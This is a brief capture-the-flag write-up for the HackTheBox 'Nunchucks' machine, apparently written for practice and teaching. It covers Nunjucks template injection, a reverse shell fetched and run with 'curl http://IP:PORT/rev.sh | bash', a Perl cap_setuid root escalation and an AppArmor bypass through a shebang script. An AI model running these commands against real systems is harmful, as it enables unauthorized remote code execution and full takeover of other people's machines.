Nunchuks - HTB - Key Points
August 13, 2022•336 words
- Open ports: 22, 80 and 443 after a super quick scan
- Certificate from 443 reveals a domain, nunchucks.htb
- Subdomain enumeration reveals another possible target, store.nunchucks.htb
- The store has a newsletter subscription function that reflects the email address provided. Using Wappalyzer, we can see the website is running on NodeJS, so let's look for SSTI on NodeJS
- Hacktricks suggests the following payload to try out: {{7*7}}. This should return 49. It is the payload listed under the template engine NUNJUCKS, which also seems a strong hint that we are on the right path, considering the name of the box...
- In the same section, Hacktricks provides a full reverse shell SSTI, just edit IP and PORT to your liking. Alternatively, the command in Hacktricks to read /etc/passwd can be edited to do anything you like. The possibilities for a reverse shell here are endless. I simply used curl to load a script on the box and bash to execute it, like this: curl http://IP:PORT/rev.sh | bash
- Now that you are the low privileged user on the box, run the usual privesc checks, the one needed on this box shouldn't be too far down your list (plus, it is automatically detected by wonderful tools like linpeas and such). The perl binary has the cap_setuid capability set. You could run the following command (as per GTFObins) to escalate to root: perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
- It does not work. Why? We can look at the AppArmor profile to see that, albeit the setuid capability, the possibilities for the perl binary are fairly limited. Looking on Google for Perl AppArmor bypasses, though, you will see that the AppArmor profile is not applied when the code is in a script launched autonomously using a she-bang to specify the programming language used. So we simply paste the GTFObins code in a file that starts with #!/usr/bin/perl, make it executable and launch it
- Now that you are root, grab both flags on the box and, as always, merry hacking ;)